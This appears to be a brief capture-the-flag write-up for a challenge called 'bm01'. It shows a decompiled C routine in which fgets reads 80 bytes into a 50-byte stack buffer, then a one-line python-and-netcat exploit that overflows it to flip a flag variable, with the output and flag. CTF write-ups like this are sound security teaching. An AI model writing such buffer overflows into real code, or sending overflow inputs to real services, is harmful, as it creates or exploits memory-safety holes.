+++
title = "bm01"
+++

Unfortunately, I lost the description for this one. Won't let me access the challenge information after the competition
ended.

Quick and dirty description: given a binary, discover the vulnerability and execute it on the remote.

Ghidra decompilation of main has this little bugger:
```c
char local_43 [50];
char local_11;
undefined *puStack16;

puStack16 = &stack0x00000004;
local_11 = '\0';
puts("I\'m a parrot:");
do {
    memset(local_43,0,0x32);
    printf("%s",&DAT_000107dc);
    local_11 = '\0';
    fgets(local_43,0x50,stdin);
    putchar(10);
    puts(local_43);
} while (local_11 != 'b');
printf("Flag: %s\n",FLAG);
```

We need to overwrite `local_11` with 'b'.

```bash
python3 -c "print('b'*51)" | nc ggcs-bm01.allyourbases.co 8134
```
```text
I'm a parrot:
> 
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb

Flag: c0MinG-Up_bs-8788
```